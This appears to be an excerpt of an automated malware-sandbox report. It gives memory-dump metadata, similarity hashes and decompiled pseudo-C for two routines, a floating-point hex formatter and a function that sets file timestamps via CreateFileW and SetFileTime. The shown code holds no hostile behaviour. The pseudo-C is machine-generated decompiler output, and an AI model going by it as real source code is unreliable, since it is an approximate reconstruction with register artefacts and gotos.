                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122d247
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122d26b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122d214
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                    • API String ID: 0-56093855
                                                                                                                                                    • Opcode ID: 00a6afe21fdd169c8792aad520ac5efad465c0dbf7001f420411915f7ee1144d
                                                                                                                                                    • Instruction ID: f8327d45529c5209b3a681930abe74a29fc20d91c44096d7edd73fcc1d9da81a
                                                                                                                                                    • Opcode Fuzzy Hash: 00a6afe21fdd169c8792aad520ac5efad465c0dbf7001f420411915f7ee1144d
                                                                                                                                                    • Instruction Fuzzy Hash: 7C01F535624369BFDB319E68F84DE5B3FB9E705261B400025FA05D322AD2B1CC60E7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123905E, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E0123905E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E01233C16(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0122E340( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0122E340( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x1234881
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0122F1A0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0122E340( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0122E660();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0122E660();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0122E660();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E01239361(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E01241960(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E012387DA();
					_t183 = 0x22;
					 *_t129 = _t183;
					E012386B9();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                                                                                                                    0x0123905e
                                                                                                                                                    0x01239069
                                                                                                                                                    0x01239070
                                                                                                                                                    0x01239072
                                                                                                                                                    0x01239072
                                                                                                                                                    0x01239074
                                                                                                                                                    0x0123907d
                                                                                                                                                    0x0123907f
                                                                                                                                                    0x01239084
                                                                                                                                                    0x0123908a
                                                                                                                                                    0x012390a0
                                                                                                                                                    0x012390a5
                                                                                                                                                    0x012390a8
                                                                                                                                                    0x012390b5
                                                                                                                                                    0x012390ba
                                                                                                                                                    0x0123910e
                                                                                                                                                    0x01239116
                                                                                                                                                    0x01239118
                                                                                                                                                    0x0123911a
                                                                                                                                                    0x0123911d
                                                                                                                                                    0x0123911d
                                                                                                                                                    0x0123911d
                                                                                                                                                    0x01239123
                                                                                                                                                    0x0123912b
                                                                                                                                                    0x0123913e
                                                                                                                                                    0x01239141
                                                                                                                                                    0x01239143
                                                                                                                                                    0x01239146
                                                                                                                                                    0x01239147
                                                                                                                                                    0x01239168
                                                                                                                                                    0x0123916b
                                                                                                                                                    0x0123916b
                                                                                                                                                    0x01239149
                                                                                                                                                    0x01239149
                                                                                                                                                    0x0123914b
                                                                                                                                                    0x01239156
                                                                                                                                                    0x01239156
                                                                                                                                                    0x01239158
                                                                                                                                                    0x0123915f
                                                                                                                                                    0x0123915a
                                                                                                                                                    0x0123915a
                                                                                                                                                    0x0123915a
                                                                                                                                                    0x01239158
                                                                                                                                                    0x0123916c
                                                                                                                                                    0x0123916e
                                                                                                                                                    0x0123916f
                                                                                                                                                    0x01239172
                                                                                                                                                    0x01239174
                                                                                                                                                    0x01239188
                                                                                                                                                    0x01239176
                                                                                                                                                    0x01239176
                                                                                                                                                    0x01239176
                                                                                                                                                    0x0123918d
                                                                                                                                                    0x0123918d
                                                                                                                                                    0x01239192
                                                                                                                                                    0x01239195
                                                                                                                                                    0x012391a0
                                                                                                                                                    0x012391a0
                                                                                                                                                    0x012391a0
                                                                                                                                                    0x012391a0
                                                                                                                                                    0x012391a4
                                                                                                                                                    0x012391ab
                                                                                                                                                    0x012391ac
                                                                                                                                                    0x012391af
                                                                                                                                                    0x012391b2
                                                                                                                                                    0x012391b2
                                                                                                                                                    0x012391b4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012391cc
                                                                                                                                                    0x012391d3
                                                                                                                                                    0x012391d7
                                                                                                                                                    0x012391da
                                                                                                                                                    0x012391dd
                                                                                                                                                    0x012391df
                                                                                                                                                    0x012391df
                                                                                                                                                    0x012391df
                                                                                                                                                    0x012391e1
                                                                                                                                                    0x012391e4
                                                                                                                                                    0x012391e7
                                                                                                                                                    0x012391e9
                                                                                                                                                    0x012391f1
                                                                                                                                                    0x012391f7
                                                                                                                                                    0x012391fa
                                                                                                                                                    0x012391fd
                                                                                                                                                    0x012391fe
                                                                                                                                                    0x01239201
                                                                                                                                                    0x01239204
                                                                                                                                                    0x01239204
                                                                                                                                                    0x01239209
                                                                                                                                                    0x0123920c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239224
                                                                                                                                                    0x01239229
                                                                                                                                                    0x0123922d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239231
                                                                                                                                                    0x01239231
                                                                                                                                                    0x01239234
                                                                                                                                                    0x01239235
                                                                                                                                                    0x01239235
                                                                                                                                                    0x01239237
                                                                                                                                                    0x0123923a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123923c
                                                                                                                                                    0x0123923f
                                                                                                                                                    0x01239246
                                                                                                                                                    0x01239249
                                                                                                                                                    0x0123924c
                                                                                                                                                    0x01239262
                                                                                                                                                    0x01239262
                                                                                                                                                    0x01239262
                                                                                                                                                    0x0123924e
                                                                                                                                                    0x0123924e
                                                                                                                                                    0x01239250
                                                                                                                                                    0x01239253
                                                                                                                                                    0x0123925e
                                                                                                                                                    0x01239255
                                                                                                                                                    0x01239258
                                                                                                                                                    0x01239258
                                                                                                                                                    0x01239253
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123924c
                                                                                                                                                    0x01239241
                                                                                                                                                    0x01239241
                                                                                                                                                    0x01239243
                                                                                                                                                    0x01239243
                                                                                                                                                    0x01239197
                                                                                                                                                    0x01239197
                                                                                                                                                    0x0123919a
                                                                                                                                                    0x01239265
                                                                                                                                                    0x01239265
                                                                                                                                                    0x01239267
                                                                                                                                                    0x01239269
                                                                                                                                                    0x0123926c
                                                                                                                                                    0x0123926d
                                                                                                                                                    0x0123926e
                                                                                                                                                    0x0123926f
                                                                                                                                                    0x01239277
                                                                                                                                                    0x01239277
                                                                                                                                                    0x01239277
                                                                                                                                                    0x01239279
                                                                                                                                                    0x0123927c
                                                                                                                                                    0x0123927f
                                                                                                                                                    0x01239281
                                                                                                                                                    0x01239281
                                                                                                                                                    0x01239283
                                                                                                                                                    0x01239295
                                                                                                                                                    0x01239299
                                                                                                                                                    0x0123929c
                                                                                                                                                    0x012392a3
                                                                                                                                                    0x012392ab
                                                                                                                                                    0x012392ab
                                                                                                                                                    0x012392ae
                                                                                                                                                    0x012392b0
                                                                                                                                                    0x012392c1
                                                                                                                                                    0x012392c1
                                                                                                                                                    0x012392c5
                                                                                                                                                    0x012392c5
                                                                                                                                                    0x012392c8
                                                                                                                                                    0x012392ca
                                                                                                                                                    0x012392cd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012392b2
                                                                                                                                                    0x012392b2
                                                                                                                                                    0x012392b8
                                                                                                                                                    0x012392b8
                                                                                                                                                    0x012392bc
                                                                                                                                                    0x012392cf
                                                                                                                                                    0x012392cf
                                                                                                                                                    0x012392d3
                                                                                                                                                    0x012392d4
                                                                                                                                                    0x012392d6
                                                                                                                                                    0x012392d8
                                                                                                                                                    0x01239319
                                                                                                                                                    0x01239319
                                                                                                                                                    0x0123931b
                                                                                                                                                    0x01239328
                                                                                                                                                    0x01239328
                                                                                                                                                    0x0123932a
                                                                                                                                                    0x0123932c
                                                                                                                                                    0x0123932d
                                                                                                                                                    0x0123932e
                                                                                                                                                    0x01239335
                                                                                                                                                    0x01239338
                                                                                                                                                    0x0123933a
                                                                                                                                                    0x0123933a
                                                                                                                                                    0x0123933b
                                                                                                                                                    0x0123933d
                                                                                                                                                    0x01239340
                                                                                                                                                    0x01239340
                                                                                                                                                    0x01239342
                                                                                                                                                    0x01239344
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239344
                                                                                                                                                    0x0123931d
                                                                                                                                                    0x0123931f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239321
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239323
                                                                                                                                                    0x01239326
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239326
                                                                                                                                                    0x012392df
                                                                                                                                                    0x012392e5
                                                                                                                                                    0x012392e5
                                                                                                                                                    0x012392e7
                                                                                                                                                    0x012392e8
                                                                                                                                                    0x012392e9
                                                                                                                                                    0x012392ea
                                                                                                                                                    0x012392f1
                                                                                                                                                    0x012392f4
                                                                                                                                                    0x012392f6
                                                                                                                                                    0x012392f7
                                                                                                                                                    0x012392f9
                                                                                                                                                    0x01239306
                                                                                                                                                    0x01239306
                                                                                                                                                    0x01239308
                                                                                                                                                    0x0123930a
                                                                                                                                                    0x0123930b
                                                                                                                                                    0x0123930c
                                                                                                                                                    0x01239313
                                                                                                                                                    0x01239316
                                                                                                                                                    0x01239318
                                                                                                                                                    0x01239318
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239318
                                                                                                                                                    0x012392fb
                                                                                                                                                    0x012392fb
                                                                                                                                                    0x012392fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012392ff
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239301
                                                                                                                                                    0x01239304
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01239304
                                                                                                                                                    0x012392e1
                                                                                                                                                    0x012392e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012392e3
                                                                                                                                                    0x012392b4
                                                                                                                                                    0x012392b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012392b6
                                                                                                                                                    0x012392b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123919a
                                                                                                                                                    0x01239195
                                                                                                                                                    0x012390bc
                                                                                                                                                    0x012390be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012390c0
                                                                                                                                                    0x012390d6
                                                                                                                                                    0x012390db
                                                                                                                                                    0x012390dd
                                                                                                                                                    0x012390e9
                                                                                                                                                    0x012390ef
                                                                                                                                                    0x012390f0
                                                                                                                                                    0x012390f2
                                                                                                                                                    0x012390f4
                                                                                                                                                    0x012390ff
                                                                                                                                                    0x012390ff
                                                                                                                                                    0x01239102
                                                                                                                                                    0x01239104
                                                                                                                                                    0x01239104
                                                                                                                                                    0x01239107
                                                                                                                                                    0x012390df
                                                                                                                                                    0x012390df
                                                                                                                                                    0x012390df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012390dd
                                                                                                                                                    0x0123908c
                                                                                                                                                    0x0123908c
                                                                                                                                                    0x01239093
                                                                                                                                                    0x01239094
                                                                                                                                                    0x01239096
                                                                                                                                                    0x01239348
                                                                                                                                                    0x0123934c
                                                                                                                                                    0x01239351
                                                                                                                                                    0x01239351
                                                                                                                                                    0x01239360
                                                                                                                                                    0x01239360

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                    • Opcode ID: 5368bc68b7d4e75d7d9cee32b5eb0aa7715ff483d2baf0e8f8fec88c13379cf7
                                                                                                                                                    • Instruction ID: 72e8a7dee4ec9cb12c53e6832c9581b28f4a169facf810d478418d6a749c01ae
                                                                                                                                                    • Opcode Fuzzy Hash: 5368bc68b7d4e75d7d9cee32b5eb0aa7715ff483d2baf0e8f8fec88c13379cf7
                                                                                                                                                    • Instruction Fuzzy Hash: 5FA138F1A247479FEF22CF58C8817BEBBA5EF93318F18416DD6859B281C2B48981C750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A1EB, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E0121A1EB(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0122E1C0();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E0121A0D4( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0121A384( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E01220B3D(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E01220B3D(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E01220B3D(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0121A384( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0121B5AC( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                                                                                                                                                    0x0121a1eb
                                                                                                                                                    0x0121a1f0
                                                                                                                                                    0x0121a1fc
                                                                                                                                                    0x0121a203
                                                                                                                                                    0x0121a207
                                                                                                                                                    0x0121a214
                                                                                                                                                    0x0121a214
                                                                                                                                                    0x0121a218
                                                                                                                                                    0x0121a218
                                                                                                                                                    0x0121a221
                                                                                                                                                    0x0121a22e
                                                                                                                                                    0x0121a22e
                                                                                                                                                    0x0121a232
                                                                                                                                                    0x0121a232
                                                                                                                                                    0x0121a23b
                                                                                                                                                    0x0121a249
                                                                                                                                                    0x0121a249
                                                                                                                                                    0x0121a24d
                                                                                                                                                    0x0121a254
                                                                                                                                                    0x0121a259
                                                                                                                                                    0x0121a260
                                                                                                                                                    0x0121a276
                                                                                                                                                    0x0121a266
                                                                                                                                                    0x0121a26f
                                                                                                                                                    0x0121a26f
                                                                                                                                                    0x0121a291
                                                                                                                                                    0x0121a297
                                                                                                                                                    0x0121a29e
                                                                                                                                                    0x0121a2e8
                                                                                                                                                    0x0121a2ed
                                                                                                                                                    0x0121a2f6
                                                                                                                                                    0x0121a2f6
                                                                                                                                                    0x0121a300
                                                                                                                                                    0x0121a309
                                                                                                                                                    0x0121a309
                                                                                                                                                    0x0121a313
                                                                                                                                                    0x0121a31c
                                                                                                                                                    0x0121a31c
                                                                                                                                                    0x0121a32c
                                                                                                                                                    0x0121a330
                                                                                                                                                    0x0121a340
                                                                                                                                                    0x0121a350
                                                                                                                                                    0x0121a356
                                                                                                                                                    0x0121a35d
                                                                                                                                                    0x0121a365
                                                                                                                                                    0x0121a372
                                                                                                                                                    0x0121a372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a2a0
                                                                                                                                                    0x0121a2b1
                                                                                                                                                    0x0121a2b8
                                                                                                                                                    0x0121a377
                                                                                                                                                    0x0121a381
                                                                                                                                                    0x0121a381
                                                                                                                                                    0x0121a2d5
                                                                                                                                                    0x0121a2db
                                                                                                                                                    0x0121a2e2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a2e2
                                                                                                                                                    0x0121a29e
                                                                                                                                                    0x0121a243
                                                                                                                                                    0x0121a247
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a247
                                                                                                                                                    0x0121a228
                                                                                                                                                    0x0121a22c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a22c
                                                                                                                                                    0x0121a20e
                                                                                                                                                    0x0121a212
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,0121808F,?,?,?), ref: 0121A291
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,0121808F,?,?), ref: 0121A2D5
                                                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,0121808F,?,?,?,?,?,?,?,?), ref: 0121A356
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,0121808F,?,?,?,?,?,?,?,?,?,?,?), ref: 0121A35D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2287278272-0
                                                                                                                                                    • Opcode ID: 0266ea3351b3b22e0d7bbe563d980c919968a138289ca6928c027c30e7a3e2bf
                                                                                                                                                    • Instruction ID: 64964c0597afc11c93fa68939c0504d8fc9a24822a804aed3ef7044b48be2c4b
                                                                                                                                                    • Opcode Fuzzy Hash: 0266ea3351b3b22e0d7bbe563d980c919968a138289ca6928c027c30e7a3e2bf
                                                                                                                                                    • Instruction Fuzzy Hash: 4D41F1302593D2AAE732DF68EC44BEEBBE4ABA1300F04091DB6D0D7184C665DA48DB52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

